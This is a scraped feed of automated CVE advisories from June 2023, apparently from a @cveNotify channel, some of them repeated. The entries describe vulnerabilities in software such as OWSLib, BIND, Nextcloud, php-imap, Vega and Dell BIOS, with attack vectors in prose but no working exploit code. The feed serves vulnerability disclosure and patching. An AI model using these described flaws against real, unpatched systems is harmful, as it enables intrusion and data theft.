🚨 CVE-2023-27476OWSLib is a Python package for client programming with Open Geospatial Consortium (OGC) web service interface standards, and their related content models. OWSLib's XML parser (which supports both `lxml` and `xml.etree`) does not disable entity resolution, and could lead to arbitrary file reads from an attacker-controlled XML payload. This affects all XML parsing in the codebase. This issue has been addressed in version 0.28.1. All users are advised to upgrade. The only known workaround is to patch the library manually. See `GHSA-8h9c-r582-mggc` for details.🎖@cveNotify |
|
| 2023-06-25 20:58:12 |
🚨 CVE-2023-3396A vulnerability was found in Campcodes Retro Cellphone Online Store 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/index.php. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232351.🎖@cveNotify |
|
| 2023-06-25 20:58:11 |
🚨 CVE-2023-36632The legacy email.utils.parseaddr function in Python through 3.11.4 allows attackers to trigger "RecursionError: maximum recursion depth exceeded while calling a Python object" via a crafted argument. This argument is plausibly an untrusted value from an application's input data that was supposed to contain a name and an e-mail address. NOTE: email.utils.parseaddr is categorized as a Legacy API in the documentation of the Python email package. Applications should instead use the email.parser.BytesParser or email.parser.Parser class.🎖@cveNotify |
|
| 2023-06-25 19:58:14 |
🚨 CVE-2015-20109end_pattern (called from internal_fnmatch) in the GNU C Library (aka glibc or libc6) before 2.22 might allow context-dependent attackers to cause a denial of service (application crash), as demonstrated by use of the fnmatch library function with the **(!() pattern. NOTE: this is not the same as CVE-2015-8984; also, some Linux distributions have fixed CVE-2015-8984 but have not fixed this additional fnmatch issue.🎖@cveNotify |
|
| 2023-06-25 19:58:13 |
🚨 CVE-2023-36630In CloudPanel before 2.3.1, insecure file upload leads to privilege escalation and authentication bypass.🎖@cveNotify |
|
| 2023-06-25 06:58:16 |
🚨 CVE-2023-36612Directory traversal can occur in the Basecamp com.basecamp.bc3 application before 4.2.1 for Android, which may allow an attacker to write arbitrary files in the application's private directory. Additionally, by using a malicious intent, the attacker may redirect the server's responses (containing sensitive information) to third-party applications by using a custom-crafted deeplink scheme.🎖@cveNotify |
|
| 2023-06-25 06:58:15 |
🚨 CVE-2023-2828Every `named` instance configured to run as a recursive resolver maintains a cache database holding the responses to the queries it has recently sent to authoritative servers. The size limit for that cache database can be configured using the `max-cache-size` statement in the configuration file; it defaults to 90% of the total amount of memory available on the host. When the size of the cache reaches 7/8 of the configured limit, a cache-cleaning algorithm starts to remove expired and/or least-recently used RRsets from the cache, to keep memory use below the configured limit.It has been discovered that the effectiveness of the cache-cleaning algorithm used in `named` can be severely diminished by querying the resolver for specific RRsets in a certain order, effectively allowing the configured `max-cache-size` limit to be significantly exceeded.This issue affects BIND 9 versions 9.11.0 through 9.16.41, 9.18.0 through 9.18.15, 9.19.0 through 9.19.13, 9.11.3-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-06-25 06:58:14 |
🚨 CVE-2023-2911If the `recursive-clients` quota is reached on a BIND 9 resolver configured with both `stale-answer-enable yes;` and `stale-answer-client-timeout 0;`, a sequence of serve-stale-related lookups could cause `named` to loop and terminate unexpectedly due to a stack overflow.This issue affects BIND 9 versions 9.16.33 through 9.16.41, 9.18.7 through 9.18.15, 9.16.33-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-06-24 14:58:35 |
🚨 CVE-2023-35931Shescape is a simple shell escape library for JavaScript. An attacker may be able to get read-only access to environment variables. This bug has been patched in version 1.7.1.🎖@cveNotify |
|
| 2023-06-24 14:58:34 |
🚨 CVE-2023-36348POS Codekop v2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the filename parameter.🎖@cveNotify |
|
| 2023-06-24 14:58:33 |
🚨 CVE-2023-3212A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel. It occurs on corrupt gfs2 file systems when the evict code tries to reference the journal descriptor structure after it has been freed and set to NULL. A privileged local user could use this flaw to cause a kernel panic.🎖@cveNotify |
|
| 2023-06-24 14:58:32 |
🚨 CVE-2023-35154Knowage is an open source analytics and business intelligence suite. Starting in version 6.0.0 and prior to version 8.1.8, an attacker can register and activate their account without having to click on the link included in the email, allowing them access to the application as a normal user. This issue has been patched in version 8.1.8.🎖@cveNotify |
|
| 2023-06-24 14:58:30 |
🚨 CVE-2023-27908A maliciously crafted DLL file can be forced to write beyond allocated boundaries in the Autodesk installer when parsing the DLL files and could lead to a Privilege Escalation vulnerability.🎖@cveNotify |
|
| 2023-06-24 14:58:29 |
🚨 CVE-2023-34203In Progress OpenEdge OEM (OpenEdge Management) and OEE (OpenEdge Explorer) before 12.7, a remote user (who has any OEM or OEE role) could perform a URL injection attack to change identity or role membership, e.g., escalate to admin. This affects OpenEdge LTS before 11.7.16, 12.x before 12.2.12, and 12.3.x through 12.6.x before 12.7.🎖@cveNotify |
|
| 2023-06-24 14:58:28 |
🚨 CVE-2023-35163Vega is a decentralized trading platform that allows pseudo-anonymous trading of derivatives on a blockchain. Prior to version 0.71.6, a vulnerability exists that allows a malicious validator to trick the Vega network into re-processing past Ethereum events from Vega’s Ethereum bridge. For example, a deposit to the collateral bridge for 100USDT that credits a party’s general account on Vega, can be re-processed 50 times resulting in 5000USDT in that party’s general account. This is without depositing any more than the original 100USDT on the bridge. Despite this exploit requiring access to a validator's Vega key, a validator key can be obtained at the small cost of 3000VEGA, the amount needed to announce a new node onto the network.A patch is available in version 0.71.6. No known workarounds are available, however there are mitigations in place should this vulnerability be exploited. There are monitoring alerts for `mainnet1` in place to identify any issues of this nature including this vulnerability being exploited. The validators have the ability to stop the bridge thus stopping any withdrawals should this vulnerability be exploited.🎖@cveNotify |
|
| 2023-06-24 14:58:27 |
🚨 CVE-2023-34460Tauri is a framework for building binaries for all major desktop platforms. The 1.4.0 release includes a regression on the Filesystem scope check for dotfiles on Unix. Previously dotfiles were not implicitly allowed by the glob wildcard scopes (eg. `$HOME/*`), but a regression was introduced when a configuration option for this behavior was implemented. Only Tauri applications using wildcard scopes in the `fs` endpoint are affected. The regression has been patched on version 1.4.1.🎖@cveNotify |
|
| 2023-06-24 14:58:26 |
🚨 CVE-2023-35167Remult is a CRUD framework for full-stack TypeScript. If you used the apiPrefilter option of the `@Entity` decorator, by setting it to a function that returns a filter that prevents unauthorized access to data, an attacker who knows the `id` of an entity instance is not authorized to access, can gain read, update and delete access to it. The issue is fixed in version 0.20.6. As a workaround, set the `apiPrefilter` option to a filter object instead of a function.🎖@cveNotify |
|
| 2023-06-24 14:58:25 |
🚨 CVE-2023-35759In Progress WhatsUp Gold before 23.0.0, an SNMP-related application endpoint failed to adequately sanitize malicious input. This could allow an unauthenticated attacker to execute arbitrary code in a victim's browser, aka XSS.🎖@cveNotify |
|
| 2023-06-24 14:58:21 |
🚨 CVE-2023-36345A Cross-Site Request Forgery (CSRF) in POS Codekop v2.0 allows attackers to escalate privileges.🎖@cveNotify |
|
| 2023-06-24 14:58:20 |
🚨 CVE-2023-35165AWS Cloud Development Kit (AWS CDK) is an open-source software development framework to define cloud infrastructure in code and provision it through AWS CloudFormation. In the packages `aws-cdk-lib` 2.0.0 until 2.80.0 and `@aws-cdk/aws-eks` 1.57.0 until 1.202.0, `eks.Cluster` and `eks.FargateCluster` constructs create two roles, `CreationRole` and `default MastersRole`, that have an overly permissive trust policy. The first, referred to as the `CreationRole`, is used by lambda handlers to create the cluster and deploy Kubernetes resources (e.g `KubernetesManifest`, `HelmChart`, ...) onto it. Users with CDK version higher or equal to 1.62.0 (including v2 users) may be affected. The second, referred to as the `default MastersRole`, is provisioned only if the `mastersRole` property isn't provided and has permissions to execute `kubectl` commands on the cluster. Users with CDK version higher or equal to 1.57.0 (including v2 users) may be affected.The issue has been fixed in `@aws-cdk/aws-eks` v1.202.0 and `aws-cdk-lib` v2.80.0. These versions no longer use the account root principal. Instead, they restrict the trust policy to the specific roles of lambda handlers that need it. There is no workaround available for CreationRole. To avoid creating the `default MastersRole`, use the `mastersRole` property to explicitly provide a role.🎖@cveNotify |
|
| 2023-06-24 14:58:19 |
🚨 CVE-2023-36346POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.🎖@cveNotify |
|
| 2023-06-24 14:58:18 |
🚨 CVE-2023-34254The GLPI Agent is a generic management agent. Prior to version 1.5, if glpi-agent is running remoteinventory task against an Unix platform with ssh command, an administrator user on the remote can manage to inject a command in a specific workflow the agent would run with the privileges it uses. In the case, the agent is running with administration privileges, a malicious user could gain high privileges on the computer glpi-agent is running on. A malicious user could also disclose all remote accesses the agent is configured with for remoteinventory task. This vulnerability has been patched in glpi-agent 1.5.🎖@cveNotify |
|
| 2023-06-24 14:58:17 |
🚨 CVE-2023-35169PHP-IMAP is a wrapper for common IMAP communication without the need to have the php-imap module installed / enabled. Prior to version 5.3.0, an unsanitized attachment filename allows any unauthenticated user to leverage a directory traversal vulnerability, which results in a remote code execution vulnerability. Every application that stores attachments with `Attachment::save()` without providing a `$filename` or passing unsanitized user input is affected by this attack.An attacker can send an email with a malicious attachment to the inbox, which gets crawled with `webklex/php-imap` or `webklex/laravel-imap`. Prerequisite for the vulnerability is that the script stores the attachments without providing a `$filename`, or providing an unsanitized `$filename`, in `src/Attachment::save(string $path, string $filename = null)`. In this case, where no `$filename` gets passed into the `Attachment::save()` method, the package would use a series of unsanitized and insecure input values from the mail as fallback. Even if a developer passes a `$filename` into the `Attachment::save()` method, e.g. by passing the name or filename of the mail attachment itself (from email headers), the input values never get sanitized by the package. There is also no restriction about the file extension (e.g. ".php") or the contents of a file. This allows an attacker to upload malicious code of any type and content at any location where the underlying user has write permissions. The attacker can also overwrite existing files and inject malicious code into files that, e.g. get executed by the system via cron or requests.Version 5.3.0 contains a patch for this issue.🎖@cveNotify |
|
| 2023-06-24 14:58:16 |
🚨 CVE-2023-35171NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform. Starting in version 26.0.0 and prior to version 26.0.2, an attacker could supply a URL that redirects an unsuspecting victim from a legitimate domain to an attacker's site. Nextcloud Server and Nextcloud Enterprise Server 26.0.2 contain a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2023-06-24 14:58:15 |
🚨 CVE-2023-35172NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform. In NextCloud Server versions 25.0.0 until 25.0.7 and 26.0.0 until 26.0.2 and Nextcloud Enterprise Server versions 21.0.0 until 21.0.9.12, 22.0.0 until 22.2.10.12, 23.0.0 until 23.0.12.7, 24.0.0 until 24.0.12.2, 25.0.0 until 25.0.7, and 26.0.0 until 26.0.2, an attacker can bruteforce the password reset links. Nextcloud Server n 25.0.7 and 26.0.2 and Nextcloud Enterprise Server 21.0.9.12, 22.2.10.12, 23.0.12.7, 24.0.12.2, 25.0.7, and 26.0.2 contain a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2023-06-24 14:58:14 |
🚨 CVE-2023-35173Nextcloud End-to-end encryption app provides all the necessary APIs to implement End-to-End encryption on the client side. By providing an invalid meta data file, an attacker can make previously dropped files inaccessible. It is recommended that the Nextcloud End-to-end encryption app is upgraded to version 1.12.4 that contains the fix.🎖@cveNotify |
|
| 2023-06-24 14:58:13 |
🚨 CVE-2023-35927NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform. In NextCloud Server versions 25.0.0 until 25.0.7 and 26.0.0 until 26.0.2 and Nextcloud Enterprise Server versions 21.0.0 until 21.0.9.12, 22.0.0 until 22.2.10.12, 23.0.0 until 23.0.12.7, 24.0.0 until 24.0.12.2, 25.0.0 until 25.0.7, and 26.0.0 until 26.0.2, when two server are registered as trusted servers for each other and successfully exchanged the share secrets, the malicious server could modify or delete VCards in the system addressbook on the origin server. This would impact the available and shown information in certain places, such as the user search and avatar menu. If a manipulated user modifies their own data in the personal settings the entry is fixed again.Nextcloud Server n 25.0.7 and 26.0.2 and Nextcloud Enterprise Server 21.0.9.12, 22.2.10.12, 23.0.12.7, 24.0.12.2, 25.0.7, and 26.0.2 contain a patch for this issue. A workaround is available. Remove all trusted servers in the "Administration" > "Sharing" settings `…/index.php/settings/admin/sharing`. Afterwards, trigger a recreation of the local system addressbook with the following `occ dav:sync-system-addressbook`.🎖@cveNotify |
|
| 2023-06-24 14:58:12 |
🚨 CVE-2023-35928Nextcloud Server is a space for data storage on Nextcloud, a self-hosted productivity playform. In NextCloud Server versions 25.0.0 until 25.0.7 and 26.0.0 until 26.0.2 and Nextcloud Enterprise Server versions 19.0.0 until 19.0.13.9, 20.0.0 until 20.0.14.14, 21.0.0 until 21.0.9.12, 22.0.0 until 22.2.10.12, 23.0.0 until 23.0.12.7, 24.0.0 until 24.0.12.2, 25.0.0 until 25.0.7, and 26.0.0 until 26.0.2, a user could use this functionality to get access to the login credentials of another user and take over their account. This issue has been patched in Nextcloud Server versions 25.0.7 and 26.0.2 and NextCloud Enterprise Server versions 19.0.13.9, 20.0.14.14, 21.0.9.12, 22.2.10.12, 23.0.12.7, 24.0.12.2, 25.0.7, and 26.0.2.Three workarounds are available. Disable app files_external. Change config setting "Allow users to mount external storage" to disabled in "Administration" > "External storage" settings `…/index.php/settings/admin/externalstorages`. Change config setting to disallow users to create external storages in "Administration" > "External storage" settings `…/index.php/settings/admin/externalstorages` with the types FTP, Nextcloud, SFTP, and/or WebDAV.🎖@cveNotify |
|
| 2023-06-24 10:58:22 |
🚨 CVE-2023-31975yasm v1.3.0 was discovered to contain a memory leak via the function yasm_intnum_copy at /libyasm/intnum.c.🎖@cveNotify |
|
| 2023-06-24 05:58:33 |
🚨 CVE-2023-1724Faveo Helpdesk Enterprise version 6.0.1 allows an attacker with agent permissions to perform privilege escalation on the application. This occurs because the application is vulnerable to stored XSS.🎖@cveNotify |
|
| 2023-06-24 05:58:30 |
🚨 CVE-2022-47376The Alaris Infusion Central software, versions 1.1 to 1.3.2, may contain a recoverable password after the installation. No patient health data is stored in the database, although some site installations may choose to store personal data.🎖@cveNotify |
|
| 2023-06-24 05:58:28 |
🚨 CVE-2023-1721Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.🎖@cveNotify |
|
| 2023-06-24 00:58:13 |
🚨 CVE-2023-1783OrangeScrum version 2.0.11 allows an external attacker to remotely obtain AWS instance credentials. This is possible because the application does not properly validate the HTML content to be converted to PDF.🎖@cveNotify |
|
| 2023-06-24 00:58:12 |
🚨 CVE-2023-35932jcvi is a Python library to facilitate genome assembly, annotation, and comparative genomics. A configuration injection happens when user input is considered by the application in an unsanitized format and can reach the configuration file. A malicious user may craft a special payload that may lead to a command injection. The impact of a configuration injection may vary. Under some conditions, it may lead to command injection if there is for instance shell code execution from the configuration file values. This vulnerability does not currently have a fix.🎖@cveNotify |
|
| 2023-06-23 23:58:38 |
🚨 CVE-2023-35154Knowage is an open source analytics and business intelligence suite. Starting in version 6.0.0 and prior to version 8.1.8, an attacker can register and activate their account without having to click on the link included in the email, allowing them access to the application as a normal user. This issue has been patched in version 8.1.8.🎖@cveNotify |
|
| 2023-06-23 23:58:37 |
🚨 CVE-2023-35163Vega is a decentralized trading platform that allows pseudo-anonymous trading of derivatives on a blockchain. Prior to version 0.71.6, a vulnerability exists that allows a malicious validator to trick the Vega network into re-processing past Ethereum events from Vega’s Ethereum bridge. For example, a deposit to the collateral bridge for 100USDT that credits a party’s general account on Vega, can be re-processed 50 times resulting in 5000USDT in that party’s general account. This is without depositing any more than the original 100USDT on the bridge. Despite this exploit requiring access to a validator's Vega key, a validator key can be obtained at the small cost of 3000VEGA, the amount needed to announce a new node onto the network.A patch is available in version 0.71.6. No known workarounds are available, however there are mitigations in place should this vulnerability be exploited. There are monitoring alerts for `mainnet1` in place to identify any issues of this nature including this vulnerability being exploited. The validators have the ability to stop the bridge thus stopping any withdrawals should this vulnerability be exploited.🎖@cveNotify |
|
| 2023-06-23 23:58:36 |
🚨 CVE-2023-35165AWS Cloud Development Kit (AWS CDK) is an open-source software development framework to define cloud infrastructure in code and provision it through AWS CloudFormation. In the packages `aws-cdk-lib` 2.0.0 until 2.80.0 and `@aws-cdk/aws-eks` 1.57.0 until 1.202.0, `eks.Cluster` and `eks.FargateCluster` constructs create two roles, `CreationRole` and `default MastersRole`, that have an overly permissive trust policy. The first, referred to as the `CreationRole`, is used by lambda handlers to create the cluster and deploy Kubernetes resources (e.g `KubernetesManifest`, `HelmChart`, ...) onto it. Users with CDK version higher or equal to 1.62.0 (including v2 users) may be affected. The second, referred to as the `default MastersRole`, is provisioned only if the `mastersRole` property isn't provided and has permissions to execute `kubectl` commands on the cluster. Users with CDK version higher or equal to 1.57.0 (including v2 users) may be affected.The issue has been fixed in `@aws-cdk/aws-eks` v1.202.0 and `aws-cdk-lib` v2.80.0. These versions no longer use the account root principal. Instead, they restrict the trust policy to the specific roles of lambda handlers that need it. There is no workaround available for CreationRole. To avoid creating the `default MastersRole`, use the `mastersRole` property to explicitly provide a role.🎖@cveNotify |
|
| 2023-06-23 23:58:35 |
🚨 CVE-2023-34254The GLPI Agent is a generic management agent. Prior to version 1.5, if glpi-agent is running remoteinventory task against an Unix platform with ssh command, an administrator user on the remote can manage to inject a command in a specific workflow the agent would run with the privileges it uses. In the case, the agent is running with administration privileges, a malicious user could gain high privileges on the computer glpi-agent is running on. A malicious user could also disclose all remote accesses the agent is configured with for remoteinventory task. This vulnerability has been patched in glpi-agent 1.5.🎖@cveNotify |
|
| 2023-06-23 23:58:34 |
🚨 CVE-2023-35169PHP-IMAP is a wrapper for common IMAP communication without the need to have the php-imap module installed / enabled. Prior to version 5.3.0, an unsanitized attachment filename allows any unauthenticated user to leverage a directory traversal vulnerability, which results in a remote code execution vulnerability. Every application that stores attachments with `Attachment::save()` without providing a `$filename` or passing unsanitized user input is affected by this attack.An attacker can send an email with a malicious attachment to the inbox, which gets crawled with `webklex/php-imap` or `webklex/laravel-imap`. Prerequisite for the vulnerability is that the script stores the attachments without providing a `$filename`, or providing an unsanitized `$filename`, in `src/Attachment::save(string $path, string $filename = null)`. In this case, where no `$filename` gets passed into the `Attachment::save()` method, the package would use a series of unsanitized and insecure input values from the mail as fallback. Even if a developer passes a `$filename` into the `Attachment::save()` method, e.g. by passing the name or filename of the mail attachment itself (from email headers), the input values never get sanitized by the package. There is also no restriction about the file extension (e.g. ".php") or the contents of a file. This allows an attacker to upload malicious code of any type and content at any location where the underlying user has write permissions. The attacker can also overwrite existing files and inject malicious code into files that, e.g. get executed by the system via cron or requests.Version 5.3.0 contains a patch for this issue.🎖@cveNotify |
|
| 2023-06-23 23:58:30 |
🚨 CVE-2023-35171NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform. Starting in version 26.0.0 and prior to version 26.0.2, an attacker could supply a URL that redirects an unsuspecting victim from a legitimate domain to an attacker's site. Nextcloud Server and Nextcloud Enterprise Server 26.0.2 contain a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2023-06-23 23:58:29 |
🚨 CVE-2023-35172NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform. In NextCloud Server versions 25.0.0 until 25.0.7 and 26.0.0 until 26.0.2 and Nextcloud Enterprise Server versions 21.0.0 until 21.0.9.12, 22.0.0 until 22.2.10.12, 23.0.0 until 23.0.12.7, 24.0.0 until 24.0.12.2, 25.0.0 until 25.0.7, and 26.0.0 until 26.0.2, an attacker can bruteforce the password reset links. Nextcloud Server n 25.0.7 and 26.0.2 and Nextcloud Enterprise Server 21.0.9.12, 22.2.10.12, 23.0.12.7, 24.0.12.2, 25.0.7, and 26.0.2 contain a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2023-06-23 23:58:28 |
🚨 CVE-2023-35173Nextcloud End-to-end encryption app provides all the necessary APIs to implement End-to-End encryption on the client side. By providing an invalid meta data file, an attacker can make previously dropped files inaccessible. It is recommended that the Nextcloud End-to-end encryption app is upgraded to version 1.12.4 that contains the fix.🎖@cveNotify |
|
| 2023-06-23 23:58:27 |
🚨 CVE-2023-35928Nextcloud Server is a space for data storage on Nextcloud, a self-hosted productivity playform. In NextCloud Server versions 25.0.0 until 25.0.7 and 26.0.0 until 26.0.2 and Nextcloud Enterprise Server versions 19.0.0 until 19.0.13.9, 20.0.0 until 20.0.14.14, 21.0.0 until 21.0.9.12, 22.0.0 until 22.2.10.12, 23.0.0 until 23.0.12.7, 24.0.0 until 24.0.12.2, 25.0.0 until 25.0.7, and 26.0.0 until 26.0.2, a user could use this functionality to get access to the login credentials of another user and take over their account. This issue has been patched in Nextcloud Server versions 25.0.7 and 26.0.2 and NextCloud Enterprise Server versions 19.0.13.9, 20.0.14.14, 21.0.9.12, 22.2.10.12, 23.0.12.7, 24.0.12.2, 25.0.7, and 26.0.2.Three workarounds are available. Disable app files_external. Change config setting "Allow users to mount external storage" to disabled in "Administration" > "External storage" settings `…/index.php/settings/admin/externalstorages`. Change config setting to disallow users to create external storages in "Administration" > "External storage" settings `…/index.php/settings/admin/externalstorages` with the types FTP, Nextcloud, SFTP, and/or WebDAV.🎖@cveNotify |
|
| 2023-06-23 23:58:23 |
🚨 CVE-2022-24002Improper Authorization vulnerability in Link Sharing prior to version 12.4.00.3 allows attackers to open protected activity via PreconditionActivity.🎖@cveNotify |
|
| 2023-06-23 23:58:22 |
🚨 CVE-2022-24923Improper access control vulnerability in Samsung SearchWidget prior to versions 2.3.00.6 in China models allows untrusted applications to load arbitrary URL and local files in webview.🎖@cveNotify |
|
| 2023-06-23 23:58:21 |
🚨 CVE-2022-24924An improper access control in LiveWallpaperService prior to versions 3.0.9.0 allows to create a specific named system directory without a proper permission.🎖@cveNotify |
|
| 2023-06-23 23:58:20 |
🚨 CVE-2022-24915The absence of filters when loading some sections in the web application of the vulnerable device allows attackers to inject malicious code that will be interpreted when a legitimate user accesses the web section where the information is displayed. Injection can be done on specific parameters. The injected code is executed when a legitimate user attempts to upload, copy, download, or delete an existing configuration (Administrative Services).🎖@cveNotify |
|
| 2023-06-23 23:58:19 |
🚨 CVE-2022-23994An Improper access control vulnerability in StBedtimeModeReceiver in Wear OS 3.0 prior to Firmware update Feb-2022 Release allows untrusted applications to change bedtime mode without a proper permission.🎖@cveNotify |
|
| 2023-06-23 23:58:16 |
🚨 CVE-2022-24063This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sante DICOM Viewer Pro 13.2.0.21165. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-15105.🎖@cveNotify |
|
| 2023-06-23 23:58:15 |
🚨 CVE-2023-32369A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.4, macOS Big Sur 11.7.7, macOS Monterey 12.6.6. An app may be able to modify protected parts of the file system🎖@cveNotify |
|
| 2023-06-23 23:58:14 |
🚨 CVE-2023-34188The HTTP server in Mongoose before 7.10 accepts requests containing negative Content-Length headers.🎖@cveNotify |
|
| 2023-06-23 23:58:13 |
🚨 CVE-2023-35931Shescape is a simple shell escape library for JavaScript. An attacker may be able to get read-only access to environment variables. This bug has been patched in version 1.7.1.🎖@cveNotify |
|
| 2023-06-23 23:58:12 |
🚨 CVE-2023-36348POS Codekop v2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the filename parameter.🎖@cveNotify |
|
| 2023-06-23 20:58:31 |
🚨 CVE-2023-33986SAP CRM ABAP (Grantor Management) - versions 700, 701, 702, 712, 713, 714, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. After successful exploitation, an attacker can cause limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-06-23 20:58:30 |
🚨 CVE-2022-24882FreeRDP is a free implementation of the Remote Desktop Protocol (RDP). In versions prior to 2.7.0, NT LAN Manager (NTLM) authentication does not properly abort when someone provides and empty password value. This issue affects FreeRDP based RDP Server implementations. RDP clients are not affected. The vulnerability is patched in FreeRDP 2.7.0. There are currently no known workarounds.🎖@cveNotify |
|
| 2023-06-23 20:58:29 |
🚨 CVE-2023-24469Potential Cross-Site Scripting in ArcSight Logger versions prior to 7.3.0🎖@cveNotify |
|
| 2023-06-23 20:58:25 |
🚨 CVE-2023-27964An authentication issue was addressed with improved state management. This issue is fixed in AirPods Firmware Update 5E133. When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones.🎖@cveNotify |
|
| 2023-06-23 20:58:24 |
🚨 CVE-2023-28191This issue was addressed with improved redaction of sensitive information. This issue is fixed in watchOS 9.5, macOS Ventura 13.4, tvOS 16.5, iOS 16.5 and iPadOS 16.5, macOS Big Sur 11.7.7, macOS Monterey 12.6.6. An app may be able to bypass Privacy preferences🎖@cveNotify |
|
| 2023-06-23 20:58:20 |
🚨 CVE-2023-32400This issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5. Entitlements and privacy permissions granted to this app may be used by a malicious app🎖@cveNotify |
|
| 2023-06-23 20:58:19 |
🚨 CVE-2023-32363A permissions issue was addressed by removing vulnerable code and adding additional checks. This issue is fixed in macOS Ventura 13.4. An app may be able to bypass Privacy preferences🎖@cveNotify |
|
| 2023-06-23 20:58:18 |
🚨 CVE-2023-32371The issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4. An app may be able to break out of its sandbox🎖@cveNotify |
|
| 2023-06-23 20:58:15 |
🚨 CVE-2022-22630A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.6.6, macOS Monterey 12.3, Security Update 2022-004 Catalina. A remote user may cause an unexpected app termination or arbitrary code execution🎖@cveNotify |
|
| 2023-06-23 20:58:14 |
🚨 CVE-2022-42792This issue was addressed with improved data protection. This issue is fixed in iOS 16.1 and iPadOS 16. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2023-06-23 20:58:13 |
🚨 CVE-2022-46718A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, macOS Monterey 12.6.2. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2023-06-23 14:58:12 |
🚨 CVE-2023-3381A vulnerability classified as problematic was found in SourceCodester Online School Fees System 1.0. Affected by this vulnerability is an unknown functionality of the file /paysystem/datatable.php of the component GET Parameter Handler. The manipulation of the argument doj leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-232237 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-23 12:58:36 |
🚨 CVE-2023-28031Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:35 |
🚨 CVE-2023-28036Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:34 |
🚨 CVE-2023-28058Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:30 |
🚨 CVE-2023-28029Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable🎖@cveNotify |
|
| 2023-06-23 12:58:29 |
🚨 CVE-2023-28030Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:28 |
🚨 CVE-2023-28033Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:24 |
🚨 CVE-2023-28039Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:23 |
🚨 CVE-2023-28042Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:22 |
🚨 CVE-2023-25937Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:18 |
🚨 CVE-2023-28028Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:17 |
🚨 CVE-2023-28041Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 12:58:16 |
🚨 CVE-2023-28056Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 11:58:23 |
🚨 CVE-2023-25936Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-23 11:58:22 |
🚨 CVE-2023-31975yasm v1.3.0 was discovered to contain a memory leak via the function yasm_intnum_copy at /libyasm/intnum.c.🎖@cveNotify |
|
